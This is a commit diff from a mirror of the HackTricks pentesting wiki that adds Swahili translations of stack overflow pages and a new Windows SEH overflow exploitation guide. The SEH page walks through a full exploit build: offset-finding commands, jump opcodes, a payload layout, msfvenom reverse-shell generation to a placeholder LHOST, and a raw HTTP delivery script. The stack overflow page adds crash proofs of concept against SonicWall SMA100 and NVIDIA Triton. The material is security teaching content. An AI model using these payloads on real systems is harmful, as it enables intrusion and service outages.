maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/windows-hardening/authentication-credentials-uac-and-ef

Browse Source
This commit is contained in:
Translator 2025-08-28 20:21:49 +00:00
parent cf29c0f7da
commit a787989864
4 changed files with 309 additions and 112 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
src/SUMMARY.md
View File

@ -779,6 +779,7 @@
- [SROP - Sigreturn-Oriented Programming](binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md)
- [SROP - ARM64](binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md)
- [Synology Encrypted Archive Decryption](hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.md)
- [Windows Seh Overflow](binary-exploitation/stack-overflow/windows-seh-overflow.md)
- [Array Indexing](binary-exploitation/array-indexing.md)
- [Chrome Exploiting](binary-exploitation/chrome-exploiting.md)
- [Integer Overflow](binary-exploitation/integer-overflow.md)

94
src/binary-exploitation/stack-overflow/README.md
View File

@ -2,17 +2,15 @@
{{#include ../../banners/hacktricks-training.md}}
## What is a Stack Overflow
## Stack Overflow ni nini
A **stack overflow** ni udhaifu unaotokea wakati programu inapoandika data zaidi kwenye stack kuliko ilivyopewa kushikilia. Data hii ya ziada it **andika nafasi ya kumbukumbu iliyo karibu**, ikisababisha uharibifu wa data halali, kuingiliwa kwa mtiririko wa udhibiti, na kwa uwezekano wa utekelezaji wa msimbo mbaya. Tatizo hili mara nyingi linatokea kutokana na matumizi ya kazi zisizo salama ambazo hazifanyi ukaguzi wa mipaka kwenye ingizo.
A **stack overflow** ni udhaifu unaotokea wakati programu inaandika data zaidi kwenye stack kuliko iliyopewa kuhifadhi. Data ziizozidi zitabadilisha **nafasi ya kumbukumbu iliyo karibu (overwrite adjacent memory space)**, na kusababisha uharibifu wa data halali, kuingiliwa kwa mtiririko wa udhibiti, na uwezekano wa kutekelezwa kwa msimbo wa uharibifu. Tatizo hili mara nyingi hutokana na matumizi ya functions zisizo salama ambazo hazifanyi ukaguzi wa mipaka kwenye input.
Tatizo kuu la kuandika tena ni kwamba **pointer ya maagizo iliyohifadhiwa (EIP/RIP)** na **pointer ya msingi iliyohifadhiwa (EBP/RBP)** za kurudi kwenye kazi ya awali zime **hifadhiwa kwenye stack**. Hivyo, mshambuliaji ataweza kuandika tena hizo na **kudhibiti mtiririko wa utekelezaji wa programu**.
Shida kuu ya kufunika hii ni kwamba **saved instruction pointer (EIP/RIP)** na **saved base pointer (EBP/RBP)** za kurudi kwenye function iliyopita **zimehifadhiwa kwenye stack**. Kwa hivyo, mshambuliaji ataweza kuzifunika na **kudhibiti mtiririko wa utekelezaji wa programu**.
Udhaifu huu kawaida hutokea kwa sababu kazi **inakopi ndani ya stack bytes zaidi kuliko kiasi kilichotengwa kwa ajili yake**, hivyo kuwa na uwezo wa kuandika tena sehemu nyingine za stack.
Udhaifu huu kawaida hutokea kwa sababu function **inakopa ndani ya stack bytes zaidi kuliko kiasi kilichotengwa kwa ajili yake**, hivyo kuweza kufunika sehemu nyingine za stack.
Baadhi ya kazi za kawaida zinazoweza kuwa na udhaifu huu ni: **`strcpy`, `strcat`, `sprintf`, `gets`**... Pia, kazi kama **`fgets`**, **`read` & `memcpy`** ambazo zinachukua **kigezo cha urefu**, zinaweza kutumika kwa njia inayoweza kuwa na udhaifu ikiwa urefu ulioelezwa ni mkubwa kuliko ule uliotengwa.
Kwa mfano, kazi zifuatazo zinaweza kuwa na udhaifu:
Baadhi ya functions za kawaida zilizo hatarini kwa hili ni: **`strcpy`, `strcat`, `sprintf`, `gets`**... Pia, functions kama **`fgets`**, **`read`** & **`memcpy`** ambazo zinachukua **kigezo cha urefu (length argument)**, zinaweza kutumika kwa njia hatarishi ikiwa urefu uliobainishwa ni mkubwa kuliko ule uliotengwa.
```c
void vulnerable() {
char buffer[128];
@ -21,13 +19,13 @@ gets(buffer); // This is where the vulnerability lies
printf("You entered: %s\n", buffer);
}
```
### Kutafuta ofseti za Stack Overflows
### Kupata Stack Overflows offsets
Njia ya kawaida zaidi ya kutafuta stack overflows ni kutoa ingizo kubwa sana la `A`s (kwa mfano `python3 -c 'print("A"*1000)'`) na kutarajia `Segmentation Fault` ikionyesha kwamba **anwani `0x41414141` ilijaribu kufikiwa**.
Njia ya kawaida zaidi ya kupata stack overflows ni kutoa input kubwa sana ya `A`s (e.g. `python3 -c 'print("A"*1000)'`) na kutegemea `Segmentation Fault` inayoonyesha kwamba **anwani `0x41414141` ilijaribu kufikiwa**.
Zaidi ya hayo, mara tu unapogundua kwamba kuna udhaifu wa Stack Overflow utahitaji kutafuta ofseti hadi iwezekane **kufuta anwani ya kurudi**, kwa hili mara nyingi hutumiwa **De Bruijn sequence.** Ambayo kwa alfabeti iliyotolewa ya ukubwa _k_ na subsequences za urefu _n_ ni **mfuatano wa mzunguko ambapo kila subsequence inayowezekana ya urefu _n_ inaonekana mara moja tu** kama subsequence iliyo karibu.
Zaidi ya hayo, mara baada ya kugundua kuwa kuna udhaifu wa Stack Overflow, utahitaji kupata offset hadi iwezekane **kuandika upya return address**; kwa hili kawaida hutumika **De Bruijn sequence.** Kwa alfabeti yenye ukubwa _k_ na subsequences za urefu _n_, ni **mfululizo wa mviringo ambapo kila subsequence inayowezekana ya urefu _n_ inaonekana mara moja tu** kama subsequence zilizo mfululizo.
Kwa njia hii, badala ya kuhitaji kubaini ni ofseti ipi inahitajika kudhibiti EIP kwa mkono, inawezekana kutumia kama padding moja ya hizi sequences na kisha kutafuta ofseti ya bytes ambazo zilimaliza kufuta hiyo.
Kwa njia hii, badala ya kujaribu kwa mkono kugundua offset inayohitajika kudhibiti EIP, inawezekana kutumia mojawapo ya mfululizo huu kama padding kisha kutafuta offset ya bytes ambazo ziliendelea kuandika juu yake.
Inawezekana kutumia **pwntools** kwa hili:
```python
@ -50,14 +48,14 @@ pattern search $rsp #Search the offset given the content of $rsp
```
## Kutumia Stack Overflows
Wakati wa overflow (ikiwa saizi ya overflow ni kubwa vya kutosha) utaweza **kuandika upya** thamani za mabadiliko ya ndani ndani ya stack hadi kufikia **EBP/RBP na EIP/RIP (au hata zaidi)**.\
Njia ya kawaida zaidi ya kutumia aina hii ya udhaifu ni kwa **kubadilisha anwani ya kurudi** ili wakati kazi inamalizika **mchakato wa udhibiti utaelekezwa popote mtumiaji alivyobainisha** katika kiashiria hiki.
During an overflow (supposing the overflow size if big enough) you will be able to **kuandika juu** values of local variables inside the stack until reaching the saved **EBP/RBP and EIP/RIP (or even more)**.\
Njia ya kawaida ya kutumia aina hii ya udhaifu ni kwa **kubadilisha return address** ili wakati function itakapomalizika **control flow itapelekwa mahali popote mtumiaji alibainisha** kwenye pointer hii.
Hata hivyo, katika hali nyingine labda tu **kuandika upya baadhi ya thamani za mabadiliko katika stack** kunaweza kuwa ya kutosha kwa matumizi (kama katika changamoto rahisi za CTF).
Hata hivyo, katika nyakati nyingine labda tu **kuandika juu baadhi ya thamani za vigezo kwenye stack** inaweza kutosha kwa exploitation (kama katika changamoto rahisi za CTF).
### Ret2win
Katika aina hii ya changamoto za CTF, kuna **kazi** **ndani** ya binary ambayo **haitaitwa kamwe** na ambayo **unahitaji kuitwa ili kushinda**. Kwa ajili ya changamoto hizi unahitaji tu kupata **offset ya kuandika upya anwani ya kurudi** na **kupata anwani ya kazi** ya kuita (kawaida [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) itakuwa imezimwa) ili wakati kazi iliyo hatarini inarudi, kazi iliyofichwa itaitwa:
In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. Kwa changamoto hizi unahitaji tu kupata **offset ya kuandika juu return address** na **kupata address ya function** ya kuitwa (kawaida [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) itakuwa imezimwa) ili wakati function iliyo na udhaifu inaporudi, function iliyofichwa itaitwa:
{{#ref}}
@ -66,16 +64,25 @@ ret2win/
### Stack Shellcode
Katika hali hii mshambuliaji anaweza kuweka shellcode katika stack na kutumia EIP/RIP iliyo na udhibiti kuruka kwenye shellcode na kutekeleza msimbo wa kiholela:
Kwenye senario hii mshambuliaji anaweza kuweka shellcode kwenye stack na kutumia EIP/RIP iliyodhibitiwa kuruka kwenye shellcode na kutekeleza msimbo yoyote:
{{#ref}}
stack-shellcode/
{{#endref}}
### Windows SEH-based exploitation (nSEH/SEH)
On 32-bit Windows, an overflow may overwrite the Structured Exception Handler (SEH) chain instead of the saved return address. Exploitation typically replaces the SEH pointer with a POP POP RET gadget and uses the 4-byte nSEH field for a short jump to pivot back into the large buffer where shellcode lives. Mfano wa kawaida ni short jmp katika nSEH inayomwaga kwenye 5-byte near jmp iliyowekwa kabla kabisa ya nSEH kuruka mamia ya bytes nyuma kwenye mwanzo wa payload.
{{#ref}}
windows-seh-overflow.md
{{#endref}}
### ROP & Ret2... techniques
Teknolojia hii ni muundo wa msingi wa kupita ulinzi mkuu wa teknolojia iliyopita: **No executable stack (NX)**. Na inaruhusu kutekeleza mbinu kadhaa nyingine (ret2lib, ret2syscall...) ambazo zitamaliza kwa kutekeleza amri za kiholela kwa kutumia maagizo yaliyopo katika binary:
Mbinu hii ni mfumo wa msingi wa kukwepa ulinzi mkuu wa mbinu iliyotangulia: **No executable stack (NX)**. Na inaruhusu kutekeleza mbinu nyingine kadhaa (ret2lib, ret2syscall...) ambazo zitaisha zikifanya maagizo yoyote kwa kutumia maagizo yaliyopo ndani ya binary:
{{#ref}}
@ -84,7 +91,7 @@ Teknolojia hii ni muundo wa msingi wa kupita ulinzi mkuu wa teknolojia iliyopita
## Heap Overflows
Overflow si kila wakati utaenda kuwa katika stack, inaweza pia kuwa katika **heap** kwa mfano:
An overflow is not always going to be in the stack, it could also be in the **heap** for example:
{{#ref}}
@ -93,43 +100,43 @@ Overflow si kila wakati utaenda kuwa katika stack, inaweza pia kuwa katika **hea
## Aina za ulinzi
Kuna ulinzi kadhaa zinazojaribu kuzuia matumizi ya udhaifu, angalia katika:
There are several protections trying to prevent the exploitation of vulnerabilities, check them in:
{{#ref}}
../common-binary-protections-and-bypasses/
{{#endref}}
### Mfano wa Uhalisia: CVE-2025-40596 (SonicWall SMA100)
### Real-World Example: CVE-2025-40596 (SonicWall SMA100)
Onyesho zuri la kwa nini **`sscanf` haipaswi kuaminika kamwe kwa kuchambua pembejeo zisizoaminika** lilionekana mwaka wa 2025 katika kifaa cha SonicWall SMA100 SSL-VPN.
Ruti iliyo hatarini ndani ya `/usr/src/EasyAccess/bin/httpd` inajaribu kutoa toleo na kiunganishi kutoka kwa URI yoyote inayaanza na `/__api__/`:
Uonyesho mzuri wa kwanini **`sscanf` haipaswi kamwe kuaminiwa kwa kuchakata input isiyothibitishwa** ulitokea mwaka 2025 katika kifaa cha SonicWall SMA100 SSL-VPN.
Routi iliyo na udhaifu ndani ya `/usr/src/EasyAccess/bin/httpd` inajaribu kutoa version na endpoint kutoka URI yoyote inayoanza na `/__api__/`:
```c
char version[3];
char endpoint[0x800] = {0};
/* simplified proto-type */
sscanf(uri, "%*[^/]/%2s/%s", version, endpoint);
```
1. Mabadiliko ya kwanza (`%2s`) hifadhi salama **bytes mbili** ndani ya `version` (kwa mfano, `"v1"`).
2. Mabadiliko ya pili (`%s`) **hayana mwelekeo wa urefu**, kwa hivyo `sscanf` itaendelea nakala **hadi byte ya kwanza ya NUL**.
3. Kwa sababu `endpoint` iko kwenye **stack** na ina **urefu wa 0x800 bytes**, kutoa njia ndefu zaidi ya 0x800 bytes inaharibu kila kitu kilichopo baada ya buffer ikiwa ni pamoja na **stack canary** na **anwani ya kurudi iliyohifadhiwa**.
1. Uongofu wa kwanza (`%2s`) huhifadhi kwa usalama **baiti mbili** ndani ya `version` (mfano `"v1"`).
2. Uongofu wa pili (`%s`) **hauna kipimo cha urefu**, kwa hivyo `sscanf` itaendelea kunakili **hadi baiti ya kwanza ya NUL**.
3. Kwa sababu `endpoint` iko kwenye **stack** na ni **0x800 bytes long**, kutoa path ndefu kuliko 0x800 bytes kunaharibu kila kitu kilicho baada ya buffer ikiwa ni pamoja na **stack canary** na **saved return address**.
Uthibitisho wa dhana wa mstari mmoja unatosha kuanzisha ajali **kabla ya uthibitisho**:
Mfano wa proof-of-concept wa mstari mmoja unatosha kusababisha crash **kabla ya authentication**:
```python
import requests, warnings
warnings.filterwarnings('ignore')
url = "https://TARGET/__api__/v1/" + "A"*3000
requests.get(url, verify=False)
```
Hata hivyo, stack canaries zinapofanya mchakato usitishwe, mshambuliaji bado anapata **Denial-of-Service** primitive (na, kwa uvujaji wa habari za ziada, huenda akapata utekelezaji wa msimbo). Somo ni rahisi:
Even though stack canaries abort the process, an attacker still gains a **Denial-of-Service** primitive (and, with additional information leaks, possibly code-execution). The lesson is simple:
* Daima toa **upana wa uwanja wa juu** (kwa mfano, `%511s`).
* Prefer njia salama kama `snprintf`/`strncpy_s`.
* Daima toa **upana wa uwanja wa juu kabisa** (kwa mfano `%511s`).
* Pendelea mbadala salama kama `snprintf`/`strncpy_s`.
### Mfano wa Uhalisia: CVE-2025-23310 & CVE-2025-23311 (NVIDIA Triton Inference Server)
### Mfano halisi: CVE-2025-23310 & CVE-2025-23311 (NVIDIA Triton Inference Server)
NVIDIAs Triton Inference Server (≤ v25.06) ilikuwa na overflows nyingi **za msingi wa stack** zinazoweza kufikiwa kupitia API yake ya HTTP.
Mwelekeo unaoweza kuathiriwa ulionekana mara kwa mara katika `http_server.cc` na `sagemaker_server.cc`:
NVIDIAs Triton Inference Server (≤ v25.06) ilikuwa na **stack-based overflows** nyingi zinazofikika kupitia HTTP API yake.
Muundo hatarishi ulijirudia katika `http_server.cc` na `sagemaker_server.cc`:
```c
int n = evbuffer_peek(req->buffer_in, -1, NULL, NULL, 0);
if (n > 0) {
@ -139,11 +146,11 @@ alloca(sizeof(struct evbuffer_iovec) * n);
...
}
```
1. `evbuffer_peek` (libevent) inarudisha **idadi ya sehemu za buffer za ndani** zinazounda mwili wa ombi la HTTP wa sasa.
2. Kila sehemu inasababisha **16-byte** `evbuffer_iovec` kutengwa kwenye **stack** kupitia `alloca()` **bila mipaka yoyote ya juu**.
3. Kwa kutumia **HTTP _chunked transfer-encoding_**, mteja anaweza kulazimisha ombi kugawanywa katika **mamia ya maelfu ya vipande vya 6-byte** (`"1\r\nA\r\n"`). Hii inafanya `n` kukua bila mipaka hadi stack itumike.
1. `evbuffer_peek` (libevent) hurudisha **idadi ya sehemu za buffer za ndani** ambazo zinaunda mwili wa ombi la HTTP wa sasa.
2. Kila sehemu husababisha `evbuffer_iovec` ya **16-byte** kupewa nafasi kwenye **stack** kupitia `alloca()` **bila kikomo cha juu**.
3. Kwa kutumia vibaya **HTTP _chunked transfer-encoding_**, mteja anaweza kulazimisha ombi kugawanywa kuwa **mamia ya maelfu ya vipande vya 6-byte** (`"1\r\nA\r\n"`). Hii inafanya `n` ikue bila kikomo hadi **stack** itakapomalizika.
#### Proof-of-Concept (DoS)
#### Uthibitisho wa Dhana (DoS)
```python
#!/usr/bin/env python3
import socket, sys
@ -167,10 +174,10 @@ s.close()
if __name__ == "__main__":
exploit(*sys.argv[1:])
```
A ~3 MB ombi linatosha kubadilisha anwani ya kurudi iliyohifadhiwa na **kuangusha** daemon kwenye ujenzi wa kawaida.
Ombi la takriban ~3 MB linatosha kuandika upya anwani ya kurudi iliyohifadhiwa na **crash** daemon kwenye default build.
#### Patch & Mitigation
Toleo la 25.07 linabadilisha ugawaji wa stack usio salama na **`std::vector` inayoungwa mkono na heap** na kushughulikia kwa ustadi `std::bad_alloc`:
Toleo la 25.07 linabadilisha unsafe stack allocation kuwa **heap-backed `std::vector`** na linashughulikia `std::bad_alloc` kwa heshima:
```c++
std::vector<evbuffer_iovec> v_vec;
try {
@ -180,13 +187,14 @@ return TRITONSERVER_ErrorNew(TRITONSERVER_ERROR_INVALID_ARG, "alloc failed");
}
struct evbuffer_iovec *v = v_vec.data();
```
Masomo yaliyopatikana:
* Kamwe usiite `alloca()` na saizi zinazodhibitiwa na mshambuliaji.
* Maombi yaliyogawanywa yanaweza kubadilisha kwa kiasi kikubwa umbo la vichwa vya seva.
* Thibitisha / weka mipaka ya thamani yoyote inayotokana na input ya mteja *kabla* ya kuitumia katika allocation za kumbukumbu.
Mafunzo yaliyopatikana:
* Kamwe usiite `alloca()` ukiwa na ukubwa unaodhibitiwa na mshambulizi.
* Chunked requests zinaweza kubadilisha kwa kiasi kikubwa muundo wa buffers za upande wa server.
* Thibitisha / weka kikomo thamani yoyote inayotokana na maingizo ya mteja *kabla* ya kuitumia katika ugawaji wa kumbukumbu.
## Marejeo
## References
* [watchTowr Labs Stack Overflows, Heap Overflows and Existential Dread (SonicWall SMA100)](https://labs.watchtowr.com/stack-overflows-heap-overflows-and-existential-dread-sonicwall-sma100-cve-2025-40596-cve-2025-40597-and-cve-2025-40598/)
* [Trail of Bits Uncovering memory corruption in NVIDIA Triton](https://blog.trailofbits.com/2025/08/04/uncovering-memory-corruption-in-nvidia-triton-as-a-new-hire/)
* [HTB: Rainbow SEH overflow to RCE over HTTP (0xdf)](https://0xdf.gitlab.io/2025/08/07/htb-rainbow.html)
{{#include ../../banners/hacktricks-training.md}}

150
src/binary-exploitation/stack-overflow/windows-seh-overflow.md Normal file
View File

@ -0,0 +1,150 @@
# Windows SEH-based Stack Overflow Exploitation (nSEH/SEH)
{{#include ../../banners/hacktricks-training.md}}
SEH-based exploitation ni mbinu ya klassiki kwenye Windows x86 inayotumia Structured Exception Handler chain iliyohifadhiwa kwenye stack. Wakati stack buffer overflow inapoandika juu ya uwanja mbili za 4-byte
- nSEH: kielekezi kwa rekodi ya SEH inayofuata, na
- SEH: kielekezi kwa function ya exception handler
mshambuliaji anaweza kuchukua udhibiti wa utekelezaji kwa:
1) Kuweka SEH kwa address ya POP POP RET gadget kwenye module isiyo na ulinzi (non-protected module), ili wakati exception itakapotumwa gadget irudie kwenye bytes zilizodhibitiwa na mshambuliaji, na
2) Kutumia nSEH kupitisha tena utekelezaji (kwa kawaida short jump) kurudi kwenye buffer kubwa iliyofurika ambapo shellcode iko.
Mbinu hii ni maalum kwa michakato ya 32-bit (x86). Kwenye mifumo ya kisasa, pendelea module isiyo na SafeSEH na ASLR kwa ajili ya gadget. Vinyago vibaya mara nyingi ni pamoja na 0x00, 0x0a, 0x0d (NUL/CR/LF) kutokana na C-strings na HTTP parsing.
---
## Finding exact offsets (nSEH / SEH)
- Sababisha crash kwenye process na kuthibitisha kuwa SEH chain imeandika upya (mf., kwenye x32dbg/x64dbg, angalia SEH view).
- Tuma cyclic pattern kama data inayofurika na hesabu offsets za dword mbili ambazo zinaingia kwenye nSEH na SEH.
Example with peda/GEF/pwntools on a 1000-byte POST body:
```bash
# generate pattern (any tool is fine)
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000
# or
python3 -c "from pwn import *; print(cyclic(1000).decode())"
# after crash, note the two 32-bit values from SEH view and compute offsets
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 0x32424163 # nSEH
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 0x41484241 # SEH
# ➜ offsets example: nSEH=660, SEH=664
```
Thibitisha kwa kuweka alama katika nafasi hizo (mfano, nSEH=b"BB", SEH=b"CC"). Hifadhi urefu mzima usibadilike ili kufanya crash iweze kurudiwa.
---
## Kuchagua POP POP RET (SEH gadget)
Unahitaji mfululizo wa POP POP RET ili kuondoa SEH frame na kurudi ndani ya bytes zako za nSEH. Tafuta katika module isiyo na SafeSEH na ikiwezekana isiyo na ASLR:
- Mona (Immunity/WinDbg): `!mona modules` kisha `!mona seh -m modulename`.
- x64dbg plugin ERC.Xdbg: `ERC --SEH` ili orodhesha POP POP RET gadgets na hali ya SafeSEH.
Chagua anwani isiyo na badchars wakati imeandikwa little-endian (mfano, `p32(0x004094D8)`). Toa kipaumbele kwa gadgets ndani ya vulnerable binary ikiwa ulinzi unaruhusu.
---
## Mbinu ya jump-back (short + near jmp)
nSEH ni bytes 4 tu, ambayo inafaa angalau short jump ya 2-byte (`EB xx`) pamoja na padding. Ikiwa lazima uruke nyuma mamia ya bytes kufikia mwanzo wa buffer yako, tumia near jump ya 5-byte iliyowekwa kabla ya nSEH na uiunganishe nayo kwa short jump kutoka nSEH.
Kwa nasmshell:
```text
nasm> jmp -660 ; too far for short; near jmp is 5 bytes
E967FDFFFF
nasm> jmp short -8 ; 2-byte short jmp fits in nSEH (with 2 bytes padding)
EBF6
nasm> jmp -652 ; 8 bytes closer (to account for short-jmp hop)
E96FFDFFFF
```
Wazo la mpangilio kwa payload ya 1000-byte yenye nSEH kwenye offset 660:
```python
buffer_length = 1000
payload = b"\x90"*50 + shellcode # NOP sled + shellcode at buffer start
payload += b"A" * (660 - 8 - len(payload)) # pad so we are 8 bytes before nSEH
payload += b"\xE9\x6F\xFD\xFF\xFF" + b"EEE" # near jmp -652 (5B) + 3B padding
payload += b"\xEB\xF6" + b"BB" # nSEH: short jmp -8 + 2B pad
payload += p32(0x004094D8) # SEH: POP POP RET (no badchars)
payload += b"D" * (buffer_length - len(payload))
```
Execution flow:
- Exception inatokea, dispatcher anatumia SEH iliyobadilishwa.
- POP POP RET hurejesha mtiririko hadi nSEH yetu.
- nSEH inatekeleza `jmp short -8` kuelekea near jump ya 5-byte.
- Near jump inafika mwanzoni mwa buffer yetu ambapo NOP sled + shellcode ziko.
---
## Herufi mbaya
Jenga string kamili ya badchar na linganisha memory ya stack baada ya crash, ukiondoa bytes ambazo zimeharibika na parser ya target. Kwa HTTP-based overflows, `\x00\x0a\x0d` karibu daima zimeachwa nje.
```python
badchars = bytes([x for x in range(1,256)])
payload = b"A"*660 + b"BBBB" + b"CCCC" + badchars # position appropriately for your case
```
---
## Shellcode generation (x86)
Tumia msfvenom na badchars zako. NOP sled ndogo husaidia kuvumilia utofauti wa eneo la kutua.
```bash
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> \
-b "\x00\x0a\x0d" -f python -v sc
```
Ikiwa unazitengeneza mara moja, muundo wa hex ni rahisi kuingiza na ku-unhex katika Python:
```bash
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> \
-b "\x00\x0a\x0d" -f hex
```
---
## Kutuma kupitia HTTP (CRLF sahihi + Content-Length)
Wakati vector dhaifu ni mwili wa ombi la HTTP, unda ombi ghafi yenye CRLFs sahihi na Content-Length ili server isome mwili mzima uliovuja.
```python
# pip install pwntools
from pwn import remote
host, port = "<TARGET_IP>", 8080
body = b"A" * 1000 # replace with the SEH-aware buffer above
req = f"""POST / HTTP/1.1
Host: {host}:{port}
User-Agent: curl/8.5.0
Accept: */*
Content-Length: {len(body)}
Connection: close
""".replace('\n','\r\n').encode() + body
p = remote(host, port)
p.send(req)
print(p.recvall(timeout=0.5))
p.close()
```
---
## Zana
- x32dbg/x64dbg kutazama mnyororo wa SEH na kutathmini crash.
- ERC.Xdbg (x64dbg plugin) kuorodhesha SEH gadgets: `ERC --SEH`.
- Mona kama mbadala: `!mona modules`, `!mona seh`.
- nasmshell kutengeneza short/near jumps na kunakili raw opcodes.
- pwntools kutengeneza payloads sahihi za mtandao.
---
## Vidokezo na tahadhari
- Inatumika tu kwa michakato ya x86. x64 inatumia mpangilio tofauti wa SEH na SEH-based exploitation kwa ujumla haiwezi kutumika.
- Pendelea gadgets katika modules bila SafeSEH na ASLR; vinginevyo, tafuta module isiyo na ulinzi iliyopakiwa kwenye mchakato.
- Watchdog za huduma zinazorestart moja kwa moja baada ya crash zinaweza kufanya iterative exploit development iwe rahisi.
## References
- [HTB: Rainbow SEH overflow to RCE over HTTP (0xdf)](https://0xdf.gitlab.io/2025/08/07/htb-rainbow.html)
- [ERC.Xdbg Exploit Research Plugin for x64dbg (SEH search)](https://github.com/Andy53/ERC.Xdbg)
- [Corelan Exploit writing tutorial part 7 (SEH)](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-7-unicode-0day-buffer-overflow-seh-and-venetian-shellcode/)
- [Mona.py WinDbg/Immunity helper](https://github.com/corelan/mona)
{{#include ../../banners/hacktricks-training.md}}

176
src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
View File

@ -1,58 +1,59 @@
# UAC - User Account Control
# UAC - Udhibiti wa Akaunti ya Mtumiaji
{{#include ../../banners/hacktricks-training.md}}
## UAC
[User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) ni kipengele kinachowezesha **kuonyeshwa kwa idhini kwa shughuli za juu**. Programu zina viwango tofauti vya `integrity`, na programu yenye **kiwango cha juu** inaweza kufanya kazi ambazo **zinaweza kuhatarisha mfumo**. Wakati UAC imewezeshwa, programu na kazi kila wakati **zinafanya kazi chini ya muktadha wa usalama wa akaunti isiyo ya msimamizi** isipokuwa msimamizi aidhinishe waziwazi programu/hizi kazi kuwa na ufikiaji wa kiwango cha msimamizi kwenye mfumo ili kuendesha. Ni kipengele cha urahisi kinacholinda wasimamizi kutokana na mabadiliko yasiyokusudiwa lakini hakichukuliwi kama mpaka wa usalama.
[User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) ni kipengele kinachowezesha **kidokezo cha idhini kwa shughuli zinazohitaji mamlaka ya juu**. Programu zina ngazi mbalimbali za `integrity`, na programu yenye **ngazi ya juu** inaweza kufanya kazi ambazo zinaweza **kuathiri usalama wa mfumo**. Wakati UAC imewezeshwa, programu na shughuli zinaendesha kila wakati **chini ya muktadha wa usalama wa akaunti isiyo ya msimamizi** isipokuwa msimamizi kwa wazi awaruhusu programu/shughuli hizo kupata ufikiaji wa kiwango cha msimamizi kwenye mfumo ili kuendesha. Ni kipengele cha urahisi kinachowalinda wasimamizi dhidi ya mabadiliko yasiyotarajiwa lakini haizingatiwi kama mpaka wa usalama.
Kwa habari zaidi kuhusu ngazi za integrity:
Kwa maelezo zaidi kuhusu viwango vya integrity:
{{#ref}}
../windows-local-privilege-escalation/integrity-levels.md
{{#endref}}
Wakati UAC ipo, mtumiaji wa msimamizi anapewa tokeni 2: ufunguo wa mtumiaji wa kawaida, ili kufanya vitendo vya kawaida kama kiwango cha kawaida, na moja yenye ruhusa za msimamizi.
Wakati UAC iko, mtumiaji msimamizi anapewa tokeni 2: tokeni ya kawaida ya mtumiaji, kwa kutekeleza vitendo vya kawaida kwa kiwango cha kawaida, na tokeni moja yenye haki za msimamizi.
Hii [page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) inajadili jinsi UAC inavyofanya kazi kwa undani mkubwa na inajumuisha mchakato wa kuingia, uzoefu wa mtumiaji, na usanifu wa UAC. Wasimamizi wanaweza kutumia sera za usalama kuunda jinsi UAC inavyofanya kazi maalum kwa shirika lao katika ngazi ya ndani (wakati wa kutumia secpol.msc), au kuundwa na kusukumwa kupitia Group Policy Objects (GPO) katika mazingira ya Active Directory domain. Mipangilio mbalimbali inajadiliwa kwa undani [hapa](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings). Kuna mipangilio 10 ya Group Policy ambayo inaweza kuwekwa kwa UAC. Jedwali lifuatalo linatoa maelezo zaidi:
Ukurasa huu [page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) unajadili jinsi UAC inavyofanya kazi kwa kina na unajumuisha mchakato wa kuingia, uzoefu wa mtumiaji, na usanifu wa UAC. Wasimamizi wanaweza kutumia sera za usalama kusanidi jinsi UAC inavyofanya kazi kulingana na shirika lao kwa ngazi ya eneo (kutumia secpol.msc), au kusanidiwa na kusambazwa kupitia Group Policy Objects (GPO) katika mazingira ya Active Directory domain. Mipangilio mbalimbali inajadiliwa kwa undani [here](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings). Kuna mipangilio 10 ya Group Policy inayoweza kuwekwa kwa UAC. Jedwali lifuatalo linatoa maelezo ya ziada:
| Group Policy Setting | Registry Key | Default Setting |
| Mpangilio wa Group Policy | Kifunguo cha Rejista | Mipangilio ya chaguo-msingi |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------- | ------------------------------------------------------------ |
| [User Account Control: Admin Approval Mode for the built-in Administrator account](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account) | FilterAdministratorToken | Disabled |
| [User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle | Disabled |
| [User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode) | ConsentPromptBehaviorAdmin | Prompt for consent for non-Windows binaries |
| [User Account Control: Behavior of the elevation prompt for standard users](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users) | ConsentPromptBehaviorUser | Prompt for credentials on the secure desktop |
